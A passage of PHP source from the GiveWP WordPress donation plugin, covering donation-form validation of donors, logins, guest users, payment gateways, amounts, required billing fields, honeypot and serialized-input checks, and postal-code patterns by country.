// Bailout: check if wp user is existing donor or not.
if ( ! $donor->id ) {
return;
}
$submitted_email = strtolower( $valid_data['user_email'] );
$donor_emails = array_map( 'strtolower', $donor->emails );
$email_index = array_search( $submitted_email, $donor_emails, true );
// If donor matched with email then return set formatted email from database.
if ( false !== $email_index ) {
$valid_data['user_email'] = $donor->emails[ $email_index ];
return;
}
// If this email address is not registered with this customer, see if it belongs to any other customer.
$found_donor = new Give_Donor( $submitted_email );
if ( $found_donor->id > 0 ) {
give_set_error(
'give-customer-email-exists',
sprintf(
/* translators: 1. Donor Email, 2. Submitted Email */
__( 'You are logged in as %1$s, and are submitting a donation as %2$s, which is an existing donor. To ensure that the email address is tied to the correct donor, please submit this donation from a logged-out browser, or choose another email address.', 'give' ),
$donor->email,
$submitted_email
)
);
}
}
}
/**
* Process the checkout login form
*
* @access private
* @since 1.0
*
* @return void
*/
function give_process_form_login() {
$is_ajax = ! empty( $_POST['give_ajax'] ) ? give_clean( $_POST['give_ajax'] ) : 0; // WPCS: input var ok, sanitization ok, CSRF ok.
$referrer = wp_get_referer();
$user_data = give_donation_form_validate_user_login();
if ( give_get_errors() || $user_data['user_id'] < 1 ) {
if ( $is_ajax ) {
/**
* Fires when AJAX sends back errors from the donation form.
*
* @since 1.0
*/
ob_start();
do_action( 'give_ajax_donation_errors' );
$message = ob_get_contents();
ob_end_clean();
wp_send_json_error( $message );
} else {
wp_safe_redirect( $referrer );
exit;
}
}
give_log_user_in( $user_data['user_id'], $user_data['user_login'], $user_data['user_pass'] );
if ( $is_ajax ) {
$message = Give_Notices::print_frontend_notice(
sprintf(
/* translators: %s: user first name */
esc_html__( 'Welcome %s! You have successfully logged into your account.', 'give' ),
( ! empty( $user_data['user_first'] ) ) ? $user_data['user_first'] : $user_data['user_login']
),
false,
'success'
);
wp_send_json_success( $message );
} else {
wp_safe_redirect( $referrer );
}
}
add_action( 'wp_ajax_give_process_donation_login', 'give_process_form_login' );
add_action( 'wp_ajax_nopriv_give_process_donation_login', 'give_process_form_login' );
/**
* Donation Form Validate Fields.
*
* @access private
* @since 3.5.0 validate serialized fields
* @since 1.0
*
* @return bool|array
*/
function give_donation_form_validate_fields() {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
give_donation_form_validate_name_fields($post_data);
// Validate Honeypot First.
if ( ! empty( $post_data['give-honeypot'] ) ) {
give_set_error( 'invalid_honeypot', esc_html__( 'Honeypot field detected. Go away bad bot!', 'give' ) );
}
// Validate serialized fields.
if (give_donation_form_has_serialized_fields($post_data)) {
give_set_error('invalid_serialized_fields', esc_html__('Serialized fields detected. Go away!', 'give'));
}
// Check spam detect.
if (
isset( $post_data['action'] )
&& give_is_spam_donation()
) {
give_set_error( 'spam_donation', __( 'The email you are using has been flagged as one used in SPAM comments or donations by our system. Please try using a different email address or contact the site administrator if you have any questions.', 'give' ) );
}
// Start an array to collect valid data.
$valid_data = [
'gateway' => give_donation_form_validate_gateway(), // Gateway fallback (amount is validated here).
'need_new_user' => false, // New user flag.
'need_user_login' => false, // Login user flag.
'logged_user_data' => [], // Logged user collected data.
'new_user_data' => [], // New user collected data.
'login_user_data' => [], // Login user collected data.
'guest_user_data' => [], // Guest user collected data.
'cc_info' => give_donation_form_validate_cc(), // Credit card info.
];
$form_id = (int) $post_data['give-form-id'];
// Validate agree to terms.
if ( give_is_terms_enabled( $form_id ) ) {
give_donation_form_validate_agree_to_terms();
}
if ( is_user_logged_in() ) {
// Collect logged in user data.
$valid_data['logged_in_user'] = give_donation_form_validate_logged_in_user();
} elseif (
isset( $post_data['give-purchase-var'] )
&& 'needs-to-register' === $post_data['give-purchase-var']
&& ! empty( $post_data['give_create_account'] )
) {
// Set new user registration as required.
$valid_data['need_new_user'] = true;
// Validate new user data.
$valid_data['new_user_data'] = give_donation_form_validate_new_user();
} elseif (
isset( $post_data['give-purchase-var'] )
&& 'needs-to-login' === $post_data['give-purchase-var']
) {
// Set user login as required.
$valid_data['need_user_login'] = true;
// Validate users login info.
$valid_data['login_user_data'] = give_donation_form_validate_user_login();
} else {
// Not registering or logging in, so setup guest user data.
$valid_data['guest_user_data'] = give_donation_form_validate_guest_user();
}
// Return collected data.
return $valid_data;
}
/**
* Detect serialized fields.
*
* @since 3.17.2 Use Utils::isSerialized() method which add supports to find hidden serialized data in the middle of a string
* @since 3.16.5 Make sure only string parameters are used with the ltrim() method to prevent PHP 8+ fatal errors
* @since 3.16.4 updated to check all values for serialized fields
* @since 3.16.2 added additional check for stripslashes_deep
* @since 3.14.2 add give-form-title, give_title
* @since 3.5.0
*/
function give_donation_form_has_serialized_fields(array $post_data): bool
{
foreach ($post_data as $value) {
if (Utils::isSerialized($value)) {
return true;
}
}
return false;
}
/**
* Detect spam donation.
*
* @since 1.8.14
*
* @return bool|mixed
*/
function give_is_spam_donation() {
$spam = false;
$user_agent = (string) isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ( strlen( $user_agent ) < 2 ) {
$spam = true;
}
// Allow developer to customized Akismet spam detect API call and it's response.
return apply_filters( 'give_spam', $spam );
}
/**
* Donation Form Validate Gateway
*
* Validate the gateway and donation amount.
*
* @access private
* @since 1.0
*
* @return string
*/
function give_donation_form_validate_gateway() {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$form_id = ! empty( $post_data['give-form-id'] ) ? $post_data['give-form-id'] : 0;
$amount = ! empty( $post_data['give-amount'] ) ? give_maybe_sanitize_amount( $post_data['give-amount'] ) : 0;
$gateway = ! empty( $post_data['give-gateway'] ) ? $post_data['give-gateway'] : 0;
// Bailout, if payment gateway is not submitted with donation form data.
if ( empty( $gateway ) ) {
give_set_error( 'empty_gateway', __( 'The donation form will process with a valid payment gateway.', 'give' ) );
} elseif ( ! give_is_gateway_active( $gateway ) ) {
give_set_error( 'invalid_gateway', __( 'The selected payment gateway is not enabled.', 'give' ) );
} elseif ( empty( $amount ) ) {
give_set_error( 'invalid_donation_amount', __( 'Please insert a valid donation amount.', 'give' ) );
} elseif ( ! give_verify_minimum_price( 'minimum' ) ) {
give_set_error(
'invalid_donation_minimum',
sprintf(
/* translators: %s: minimum donation amount */
__( 'This form has a minimum donation amount of %s.', 'give' ),
give_currency_filter(
give_format_amount(
give_get_form_minimum_price( $form_id ),
[
'sanitize' => false,
]
)
)
)
);
} elseif ( ! give_verify_minimum_price( 'maximum' ) ) {
give_set_error(
'invalid_donation_maximum',
sprintf(
/* translators: %s: Maximum donation amount */
__( 'This form has a maximum donation amount of %s.', 'give' ),
give_currency_filter(
give_format_amount(
give_get_form_maximum_price( $form_id ),
[
'sanitize' => false,
]
)
)
)
);
} // End if().
return $gateway;
}
/**
* Donation Form Validate Minimum or Maximum Donation Amount
*
* @access private
* @since 1.3.6
* @since 2.1 Added support for give maximum amount.
* @since 2.1.3 Added new filter to modify the return value.
*
* @param string $amount_range Which amount needs to verify? minimum or maximum.
*
* @return bool
*/
function give_verify_minimum_price( $amount_range = 'minimum' ) {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$form_id = ! empty( $post_data['give-form-id'] ) ? $post_data['give-form-id'] : 0;
$amount = ! empty( $post_data['give-amount'] ) ? give_maybe_sanitize_amount( $post_data['give-amount'], [ 'currency' => give_get_currency( $form_id ) ] ) : 0;
$price_id = isset( $post_data['give-price-id'] ) ? absint( $post_data['give-price-id'] ) : '';
$variable_prices = give_has_variable_prices( $form_id );
$price_ids = array_map( 'absint', give_get_variable_price_ids( $form_id ) );
$verified_stat = false;
if ( $variable_prices && in_array( $price_id, $price_ids, true ) ) {
$price_level_amount = give_get_price_option_amount( $form_id, $price_id );
if ( $price_level_amount == $amount ) {
$verified_stat = true;
}
}
if ( ! $verified_stat ) {
switch ( $amount_range ) {
case 'minimum':
$verified_stat = ( give_get_form_minimum_price( $form_id ) > $amount ) ? false : true;
break;
case 'maximum':
$verified_stat = ( give_get_form_maximum_price( $form_id ) < $amount ) ? false : true;
break;
}
}
/**
* Filter the verify amount
*
* @since 2.1.3
*
* @param bool $verified_stat Was verification passed or not?
* @param string $amount_range Type of the amount.
* @param integer $form_id Give Donation Form ID.
*/
return apply_filters( 'give_verify_minimum_maximum_price', $verified_stat, $amount_range, $form_id );
}
/**
* Donation form validate agree to "Terms and Conditions".
*
* @access private
* @since 1.0
*
* @return void
*/
function give_donation_form_validate_agree_to_terms() {
$agree_to_terms = ! empty( $_POST['give_agree_to_terms'] ) ? give_clean( $_POST['give_agree_to_terms'] ) : 0; // WPCS: input var ok, sanitization ok, CSRF ok.
// Proceed only, if donor agreed to terms.
if ( ! $agree_to_terms ) {
// User did not agree.
give_set_error( 'agree_to_terms', apply_filters( 'give_agree_to_terms_text', __( 'You must agree to the terms and conditions.', 'give' ) ) );
}
}
/**
* Donation Form Required Fields.
*
* @access private
* @since 1.0
*
* @param int $form_id Donation Form ID.
*
* @return array
*/
function give_get_required_fields( $form_id ) {
$posted_data = give_clean( filter_input_array( INPUT_POST ) );
$payment_mode = give_get_chosen_gateway( $form_id );
$required_fields = [
'give_email' => [
'error_id' => 'invalid_email',
'error_message' => __( 'Please enter a valid email address.', 'give' ),
],
'give_first' => [
'error_id' => 'invalid_first_name',
'error_message' => __( 'Please enter your first name.', 'give' ),
],
];
$name_title_prefix = give_is_name_title_prefix_required( $form_id );
if ( $name_title_prefix ) {
$required_fields['give_title'] = [
'error_id' => 'invalid_title',
'error_message' => __( 'Please enter your title.', 'give' ),
];
}
// If credit card fields related actions exists then check for the cc fields validations.
if (
has_action( "give_{$payment_mode}_cc_form", 'give_get_cc_form' ) ||
has_action( 'give_cc_form', 'give_get_cc_form' )
) {
// Validate card number field for empty check.
if (
isset( $posted_data['card_number'] ) &&
empty( $posted_data['card_number'] )
) {
$required_fields['card_number'] = [
'error_id' => 'empty_card_number',
'error_message' => __( 'Please enter a credit card number.', 'give' ),
];
}
// Validate card cvc field for empty check.
if (
isset( $posted_data['card_cvc'] ) &&
empty( $posted_data['card_cvc'] )
) {
$required_fields['card_cvc'] = [
'error_id' => 'empty_card_cvc',
'error_message' => __( 'Please enter a credit card CVC information.', 'give' ),
];
}
// Validate card name field for empty check.
if (
(
isset( $posted_data['give_validate_stripe_payment_fields'] ) &&
'1' === $posted_data['give_validate_stripe_payment_fields'] &&
isset( $posted_data['card_name'] ) &&
empty( $posted_data['card_name'] )
) ||
(
! isset( $posted_data['give_validate_stripe_payment_fields'] ) &&
isset( $posted_data['card_name'] ) &&
empty( $posted_data['card_name'] )
)
) {
$required_fields['card_name'] = [
'error_id' => 'empty_card_name',
'error_message' => __( 'Please enter a name of your credit card account holder.', 'give' ),
];
}
// Validate card expiry field for empty check.
if (
isset( $posted_data['card_expiry'] ) &&
empty( $posted_data['card_expiry'] )
) {
$required_fields['card_expiry'] = [
'error_id' => 'empty_card_expiry',
'error_message' => __( 'Please enter a credit card expiry date.', 'give' ),
];
}
}
$require_address = give_require_billing_address( $payment_mode );
if ( $require_address ) {
$required_fields['card_address'] = [
'error_id' => 'invalid_card_address',
'error_message' => __( 'Please enter your primary billing address.', 'give' ),
];
$required_fields['card_zip'] = [
'error_id' => 'invalid_zip_code',
'error_message' => __( 'Please enter your zip / postal code.', 'give' ),
];
$required_fields['card_city'] = [
'error_id' => 'invalid_city',
'error_message' => __( 'Please enter your billing city.', 'give' ),
];
$required_fields['billing_country'] = [
'error_id' => 'invalid_country',
'error_message' => __( 'Please select your billing country.', 'give' ),
];
$required_fields['card_state'] = [
'error_id' => 'invalid_state',
'error_message' => __( 'Please enter billing state / province / County.', 'give' ),
];
$country = ! empty( $_POST['billing_country'] ) ? give_clean( $_POST['billing_country'] ) : 0; // WPCS: input var ok, sanitization ok, CSRF ok.
// Check if billing country already exists.
if ( $country ) {
// Check if states is empty or not.
if ( array_key_exists( $country, give_states_not_required_country_list() ) ) {
// If states is empty remove the required fields of state in billing cart.
unset( $required_fields['card_state'] );
}
// Check if city is empty or not.
if ( array_key_exists( $country, give_city_not_required_country_list() ) ) {
// If states is empty remove the required fields of city in billing cart.
unset( $required_fields['card_city'] );
}
// Check if country is without post codes.
if ( array_key_exists( $country, give_get_country_list_without_postcodes() ) ) {
// If country is on the list, zip code is not required.
unset( $required_fields['card_zip'] );
}
}
} // End if().
if ( give_is_company_field_enabled( $form_id ) ) {
$form_option = give_get_meta( $form_id, '_give_company_field', true );
$global_setting = give_get_option( 'company_field' );
$is_company_field_required = false;
if ( ! empty( $form_option ) && give_is_setting_enabled( $form_option, [ 'required' ] ) ) {
$is_company_field_required = true;
} elseif ( 'global' === $form_option && give_is_setting_enabled( $global_setting, [ 'required' ] ) ) {
$is_company_field_required = true;
} elseif ( empty( $form_option ) && give_is_setting_enabled( $global_setting, [ 'required' ] ) ) {
$is_company_field_required = true;
}
if ( $is_company_field_required ) {
$required_fields['give_company_name'] = [
'error_id' => 'invalid_company',
'error_message' => __( 'Please enter Company Name.', 'give' ),
];
}
}
if ( give_is_last_name_required( $form_id ) ) {
$required_fields['give_last'] = [
'error_id' => 'invalid_last_name',
'error_message' => __( 'Please enter your last name.', 'give' ),
];
}
/**
* Filters the donation form required field.
*
* @since 1.7
*/
$required_fields = apply_filters( 'give_donation_form_required_fields', $required_fields, $form_id );
return $required_fields;
}
/**
* Check if the Billing Address is required
*
* @since 1.0.1
*
* @param string $payment_mode Payment Mode.
*
* @return bool
*/
function give_require_billing_address( $payment_mode ) {
$return = false;
$billing_country = ! empty( $_POST['billing_country'] ) ? give_clean( $_POST['billing_country'] ) : 0; // WPCS: input var ok, sanitization ok, CSRF ok.
if ( $billing_country || did_action( "give_{$payment_mode}_cc_form" ) || did_action( 'give_cc_form' ) ) {
$return = true;
}
// Let payment gateways and other extensions determine if address fields should be required.
return apply_filters( 'give_require_billing_address', $return );
}
/**
* Donation Form Validate Logged In User.
*
* @access private
* @since 1.0
*
* @return array
*/
function give_donation_form_validate_logged_in_user() {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$user_id = get_current_user_id();
$form_id = ! empty( $post_data['give-form-id'] ) ? $post_data['give-form-id'] : 0;
// Start empty array to collect valid user data.
$valid_user_data = [
// Assume there will be errors.
'user_id' => - 1,
];
// Proceed only, if valid $user_id found.
if ( $user_id > 0 ) {
// Get the logged in user data.
$user_data = get_userdata( $user_id );
// Validate Required Form Fields.
give_validate_required_form_fields( $form_id );
// Verify data.
if ( is_object( $user_data ) && $user_data->ID > 0 ) {
// Collected logged in user data.
$valid_user_data = [
'user_id' => $user_id,
'user_email' => ! empty( $post_data['give_email'] )
? sanitize_email( $post_data['give_email'] )
: $user_data->user_email,
'user_first' => ! empty( $post_data['give_first'] )
? $post_data['give_first']
: $user_data->first_name,
'user_last' => ! empty( $post_data['give_last'] )
? $post_data['give_last']
: $user_data->last_name,
];
// Validate essential form fields.
give_donation_form_validate_name_fields( $post_data );
give_check_logged_in_user_for_existing_email( $valid_user_data );
if ( ! is_email( $valid_user_data['user_email'] ) ) {
give_set_error( 'email_invalid', esc_html__( 'Invalid email.', 'give' ) );
}
} else {
// Set invalid user information error.
give_set_error( 'invalid_user', esc_html__( 'The user information is invalid.', 'give' ) );
}
}
// Return user data.
return $valid_user_data;
}
/**
* Donate Form Validate New User
*
* @access private
* @since 1.0
*
* @return array
*/
function give_donation_form_validate_new_user() {
// Default user data.
$auto_generated_password = wp_generate_password();
$default_user_data = [
'give-form-id' => '',
'user_id' => - 1, // Assume there will be errors.
'user_first' => '',
'user_last' => '',
'give_user_login' => false,
'give_email' => false,
'give_user_pass' => $auto_generated_password,
'give_user_pass_confirm' => $auto_generated_password,
];
// Get data.
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$user_data = wp_parse_args( $post_data, $default_user_data );
$form_id = absint( $user_data['give-form-id'] );
$nonce = ! empty( $post_data['give-form-user-register-hash'] ) ? $post_data['give-form-user-register-hash'] : '';
// Validate user creation nonce.
if ( ! wp_verify_nonce( $nonce, "give_form_create_user_nonce_{$form_id}" ) ) {
give_set_error( 'invalid_nonce', __( 'We\'re unable to recognize your session. Please refresh the screen to try again; otherwise contact your website administrator for assistance.', 'give' ) );
}
$registering_new_user = false;
give_donation_form_validate_name_fields( $user_data );
// Start an empty array to collect valid user data.
$valid_user_data = [
// Assume there will be errors.
'user_id' => - 1,
// Get first name.
'user_first' => $user_data['give_first'],
// Get last name.
'user_last' => $user_data['give_last'],
// Get Password.
'user_pass' => $user_data['give_user_pass'],
];
// Validate Required Form Fields.
give_validate_required_form_fields( $form_id );
// Set Email as Username.
$valid_user_data['user_login'] = $user_data['give_email'];
// Check if we have an email to verify.
if ( give_validate_user_email( $user_data['give_email'], $registering_new_user ) ) {
$valid_user_data['user_email'] = $user_data['give_email'];
}
return $valid_user_data;
}
/**
* Donation Form Validate User Login
*
* @access private
* @since 1.0
*
* @return array
*/
function give_donation_form_validate_user_login() {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
// Start an array to collect valid user data.
$valid_user_data = [
// Assume there will be errors.
'user_id' => - 1,
];
// Bailout, if Username is empty.
if ( empty( $post_data['give_user_login'] ) ) {
give_set_error( 'must_log_in', __( 'Please enter your username or email to log in.', 'give' ) );
return $valid_user_data;
}
$give_user_login = strip_tags( $post_data['give_user_login'] );
if ( is_email( $give_user_login ) ) {
// Get the user data by email.
$user_data = get_user_by( 'email', $give_user_login );
} else {
// Get the user data by login.
$user_data = get_user_by( 'login', $give_user_login );
}
// Check if user exists.
if ( $user_data ) {
// Get password.
$user_pass = ! empty( $post_data['give_user_pass'] ) ? $post_data['give_user_pass'] : false;
// Check user_pass.
if ( $user_pass ) {
// Check if password is valid.
if ( ! wp_check_password( $user_pass, $user_data->user_pass, $user_data->ID ) ) {
$current_page_url = site_url() . '/' . get_page_uri();
// Incorrect password.
give_set_error(
'password_incorrect',
sprintf(
'%1$s <a href="%2$s">%3$s</a>',
__( 'The password you entered is incorrect.', 'give' ),
wp_lostpassword_url( $current_page_url ),
__( 'Reset Password', 'give' )
)
);
} else {
// Repopulate the valid user data array.
$valid_user_data = [
'user_id' => $user_data->ID,
'user_login' => $user_data->user_login,
'user_email' => $user_data->user_email,
'user_first' => $user_data->first_name,
'user_last' => $user_data->last_name,
'user_pass' => $user_pass,
];
}
} else {
// Empty password.
give_set_error( 'password_empty', __( 'Enter a password.', 'give' ) );
}
} else {
// No username.
give_set_error( 'username_incorrect', __( 'The username you entered does not exist.', 'give' ) );
} // End if().
return $valid_user_data;
}
/**
* Donation Form Validate Guest User
*
* @access private
* @since 1.0
*
* @return array
*/
function give_donation_form_validate_guest_user() {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$form_id = ! empty( $post_data['give-form-id'] ) ? $post_data['give-form-id'] : 0;
// Start an array to collect valid user data.
$valid_user_data = [
// Set a default id for guests.
'user_id' => 0,
];
// Validate name fields.
give_donation_form_validate_name_fields( $post_data );
// Validate Required Form Fields.
give_validate_required_form_fields( $form_id );
// Get the guest email.
$guest_email = ! empty( $post_data['give_email'] ) ? $post_data['give_email'] : false;
// Check email.
if ( $guest_email && strlen( $guest_email ) > 0 ) {
// Validate email.
if ( ! is_email( $guest_email ) ) {
// Invalid email.
give_set_error( 'email_invalid', __( 'Invalid email.', 'give' ) );
} else {
// All is good to go.
$valid_user_data['user_email'] = $guest_email;
// Get user_id from donor if exist.
$donor = new Give_Donor( $guest_email );
if ( $donor->id ) {
$donor_email_index = array_search(
strtolower( $guest_email ),
array_map( 'strtolower', $donor->emails ),
true
);
$valid_user_data['user_id'] = $donor->user_id;
// Set email to original format.
// @see https://github.com/impress-org/give/issues/4025
$valid_user_data['user_email'] = $donor->emails[ $donor_email_index ];
}
}
} else {
// No email.
give_set_error( 'email_empty', __( 'Enter an email.', 'give' ) );
}
return $valid_user_data;
}
/**
* Register And Login New User
*
* @param array $user_data User Data.
*
* @access private
* @since 1.0
*
* @return integer
*/
function give_register_and_login_new_user( $user_data = [] ) {
// Verify the array.
if ( empty( $user_data ) ) {
return - 1;
}
if ( give_get_errors() ) {
return - 1;
}
$user_args = apply_filters(
'give_insert_user_args',
[
'user_login' => isset( $user_data['user_login'] ) ? $user_data['user_login'] : '',
'user_pass' => isset( $user_data['user_pass'] ) ? $user_data['user_pass'] : '',
'user_email' => isset( $user_data['user_email'] ) ? $user_data['user_email'] : '',
'first_name' => isset( $user_data['user_first'] ) ? $user_data['user_first'] : '',
'last_name' => isset( $user_data['user_last'] ) ? $user_data['user_last'] : '',
'user_registered' => date( 'Y-m-d H:i:s' ),
'role' => give_get_option( 'donor_default_user_role', 'give_donor' ),
],
$user_data
);
// Insert new user.
$user_id = wp_insert_user( $user_args );
// Validate inserted user.
if ( is_wp_error( $user_id ) ) {
return - 1;
}
// Allow themes and plugins to filter the user data.
$user_data = apply_filters( 'give_insert_user_data', $user_data, $user_args );
/**
* Fires after inserting user.
*
* @since 1.0
*
* @param int $user_id User id.
* @param array $user_data Array containing user data.
*/
do_action( 'give_insert_user', $user_id, $user_data );
/**
* Filter allow user to alter if user when to login or not when user is register for the first time.
*
* @since 1.8.13
*
* return bool True if login with registration and False if only want to register.
*/
if ( true === (bool) apply_filters( 'give_log_user_in_on_register', true ) ) {
// Login new user.
give_log_user_in( $user_id, $user_data['user_login'], $user_data['user_pass'] );
}
// Return user id.
return $user_id;
}
/**
* Get Donation Form User
*
* @since 1.0
* @since 2.17.1 Do not run validation check for ajax request expect donation validation ajax request.
*
* @param array $valid_data Valid Data.
*
* @access private
* @return array|bool
*/
function give_get_donation_form_user( $valid_data = [] ) {
// Initialize user.
$user = false;
$post_data = give_clean($_POST); // WPCS: input var ok, sanitization ok, CSRF ok.
$is_validating_donation_form_on_ajax = ! empty($_POST['give_ajax']) ? $post_data['give_ajax'] : 0; // WPCS: input var ok, sanitization ok, CSRF ok.
if ( $is_validating_donation_form_on_ajax ) {
// Do not create or login the user during the ajax submission (check for errors only).
return true;
} elseif ( is_user_logged_in() ) {
// Set the valid user as the logged in collected data.
$user = $valid_data['logged_in_user'];
} elseif ( true === $valid_data['need_new_user'] || true === $valid_data['need_user_login'] ) {
// New user registration.
if ( true === $valid_data['need_new_user'] ) {
// Set user.
$user = $valid_data['new_user_data'];
// Register and login new user.
$user['user_id'] = give_register_and_login_new_user($user);
} elseif ( true === $valid_data['need_user_login'] ) {
/**
* The login form is now processed in the give_process_donation_login() function.
* This is still here for backwards compatibility.
* This also allows the old login process to still work if a user removes the checkout login submit button.
*
* This also ensures that the donor is logged in correctly if they click "Donation" instead of submitting the login form, meaning the donor is logged in during the donation process.
*/
$user = $valid_data['login_user_data'];
// Login user.
give_log_user_in( $user['user_id'], $user['user_login'], $user['user_pass'] );
}
} // End if().
// Check guest checkout.
if ( false === $user && false === give_logged_in_only( $post_data['give-form-id'] ) ) {
// Set user.
$user = $valid_data['guest_user_data'];
}
// Verify we have an user.
if ( false === $user || empty( $user ) ) {
return false;
}
// Get user first name.
if ( ! isset( $user['user_first'] ) || strlen( trim( $user['user_first'] ) ) < 1 ) {
$user['user_first'] = isset( $post_data['give_first'] ) ? strip_tags( trim( $post_data['give_first'] ) ) : '';
}
// Get user last name.
if ( ! isset( $user['user_last'] ) || strlen( trim( $user['user_last'] ) ) < 1 ) {
$user['user_last'] = isset( $post_data['give_last'] ) ? strip_tags( trim( $post_data['give_last'] ) ) : '';
}
// Add Title Prefix to user information.
if ( empty( $user['user_title'] ) || strlen( trim( $user['user_title'] ) ) < 1 ) {
$user['user_title'] = ! empty( $post_data['give_title'] ) ? strip_tags( trim( $post_data['give_title'] ) ) : '';
}
// Get the user's billing address details.
$user['address'] = [];
$user['address']['line1'] = ! empty( $post_data['card_address'] ) ? $post_data['card_address'] : false;
$user['address']['line2'] = ! empty( $post_data['card_address_2'] ) ? $post_data['card_address_2'] : false;
$user['address']['city'] = ! empty( $post_data['card_city'] ) ? $post_data['card_city'] : false;
$user['address']['state'] = ! empty( $post_data['card_state'] ) ? $post_data['card_state'] : false;
$user['address']['zip'] = ! empty( $post_data['card_zip'] ) ? $post_data['card_zip'] : false;
$user['address']['country'] = ! empty( $post_data['billing_country'] ) ? $post_data['billing_country'] : false;
if ( empty( $user['address']['country'] ) ) {
$user['address'] = false;
} // End if().
// Return valid user.
return $user;
}
/**
* Validates the credit card info.
*
* @access private
* @since 1.0
*
* @return array
*/
function give_donation_form_validate_cc() {
$card_data = give_get_donation_cc_info();
// Validate the card zip.
if ( ! empty( $card_data['card_zip'] ) ) {
if ( ! give_donation_form_validate_cc_zip( $card_data['card_zip'], $card_data['card_country'] ) ) {
give_set_error( 'invalid_cc_zip', __( 'The zip / postal code you entered for your billing address is invalid.', 'give' ) );
}
}
// Ensure no spaces.
if ( ! empty( $card_data['card_number'] ) ) {
$card_data['card_number'] = str_replace( '+', '', $card_data['card_number'] ); // no "+" signs.
$card_data['card_number'] = str_replace( ' ', '', $card_data['card_number'] ); // No spaces.
}
// This should validate card numbers at some point too.
return $card_data;
}
/**
* Get credit card info.
*
* @access private
* @since 1.0
*
* @return array
*/
function give_get_donation_cc_info() {
// Sanitize the values submitted with donation form.
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$cc_info = [];
$cc_info['card_name'] = ! empty( $post_data['card_name'] ) ? $post_data['card_name'] : '';
$cc_info['card_number'] = ! empty( $post_data['card_number'] ) ? $post_data['card_number'] : '';
$cc_info['card_cvc'] = ! empty( $post_data['card_cvc'] ) ? $post_data['card_cvc'] : '';
$cc_info['card_exp_month'] = ! empty( $post_data['card_exp_month'] ) ? $post_data['card_exp_month'] : '';
$cc_info['card_exp_year'] = ! empty( $post_data['card_exp_year'] ) ? $post_data['card_exp_year'] : '';
$cc_info['card_address'] = ! empty( $post_data['card_address'] ) ? $post_data['card_address'] : '';
$cc_info['card_address_2'] = ! empty( $post_data['card_address_2'] ) ? $post_data['card_address_2'] : '';
$cc_info['card_city'] = ! empty( $post_data['card_city'] ) ? $post_data['card_city'] : '';
$cc_info['card_state'] = ! empty( $post_data['card_state'] ) ? $post_data['card_state'] : '';
$cc_info['card_country'] = ! empty( $post_data['billing_country'] ) ? $post_data['billing_country'] : '';
$cc_info['card_zip'] = ! empty( $post_data['card_zip'] ) ? $post_data['card_zip'] : '';
// Return cc info.
return $cc_info;
}
/**
* Validate zip code based on country code
*
* @since 1.0
*
* @param int $zip ZIP Code.
* @param string $country_code Country Code.
*
* @return bool|mixed
*/
function give_donation_form_validate_cc_zip( $zip = 0, $country_code = '' ) {
$ret = false;
if ( empty( $zip ) || empty( $country_code ) ) {
return $ret;
}
$country_code = strtoupper( $country_code );
$zip_regex = [
'AD' => 'AD\d{3}',
'AM' => '(37)?\d{4}',
'AR' => '^([A-Z]{1}\d{4}[A-Z]{3}|[A-Z]{1}\d{4}|\d{4})$',
'AS' => '96799',
'AT' => '\d{4}',
'AU' => '^(0[289][0-9]{2})|([1345689][0-9]{3})|(2[0-8][0-9]{2})|(290[0-9])|(291[0-4])|(7[0-4][0-9]{2})|(7[8-9][0-9]{2})$',
'AX' => '22\d{3}',
'AZ' => '\d{4}',
'BA' => '\d{5}',
'BB' => '(BB\d{5})?',
'BD' => '\d{4}',
'BE' => '^[1-9]{1}[0-9]{3}$',
'BG' => '\d{4}',
'BH' => '((1[0-2]|[2-9])\d{2})?',
'BM' => '[A-Z]{2}[ ]?[A-Z0-9]{2}',
'BN' => '[A-Z]{2}[ ]?\d{4}',
'BR' => '\d{5}[\-]?\d{3}',
'BY' => '\d{6}',
'CA' => '^[ABCEGHJKLMNPRSTVXY]{1}\d{1}[A-Z]{1} *\d{1}[A-Z]{1}\d{1}$',
'CC' => '6799',
'CH' => '^[1-9][0-9][0-9][0-9]$',
'CK' => '\d{4}',
'CL' => '\d{7}',
'CN' => '\d{6}',
'CR' => '\d{4,5}|\d{3}-\d{4}',
'CS' => '\d{5}',
'CV' => '\d{4}',
'CX' => '6798',
'CY' => '\d{4}',
'CZ' => '\d{3}[ ]?\d{2}',
'DE' => '\b((?:0[1-46-9]\d{3})|(?:[1-357-9]\d{4})|(?:[4][0-24-9]\d{3})|(?:[6][013-9]\d{3}))\b',
'DK' => '^([D-d][K-k])?( |-)?[1-9]{1}[0-9]{3}$',
'DO' => '\d{5}',
'DZ' => '\d{5}',
'EC' => '([A-Z]\d{4}[A-Z]|(?:[A-Z]{2})?\d{6})?',
'EE' => '\d{5}',
'EG' => '\d{5}',
'ES' => '^([1-9]{2}|[0-9][1-9]|[1-9][0-9])[0-9]{3}$',
'ET' => '\d{4}',
'FI' => '\d{5}',
'FK' => 'FIQQ 1ZZ',
'FM' => '(9694[1-4])([ \-]\d{4})?',
'FO' => '\d{3}',
'FR' => '^(F-)?((2[A|B])|[0-9]{2})[0-9]{3}$',
'GE' => '\d{4}',
'GF' => '9[78]3\d{2}',
'GL' => '39\d{2}',
'GN' => '\d{3}',
'GP' => '9[78][01]\d{2}',
'GR' => '\d{3}[ ]?\d{2}',
'GS' => 'SIQQ 1ZZ',
'GT' => '\d{5}',
'GU' => '969[123]\d([ \-]\d{4})?',
'GW' => '\d{4}',
'HM' => '\d{4}',
'HN' => '(?:\d{5})?',
'HR' => '\d{5}',
'HT' => '\d{4}',
'HU' => '\d{4}',
'ID' => '\d{5}',
'IE' => '((D|DUBLIN)?([1-9]|6[wW]|1[0-8]|2[024]))?',
'IL' => '\d{5}',
'IN' => '^[1-9][0-9][0-9][0-9][0-9][0-9]$', // India.
'IO' => 'BBND 1ZZ',
'IQ' => '\d{5}',
'IS' => '\d{3}',
'IT' => '^(V-|I-)?[0-9]{5}$',
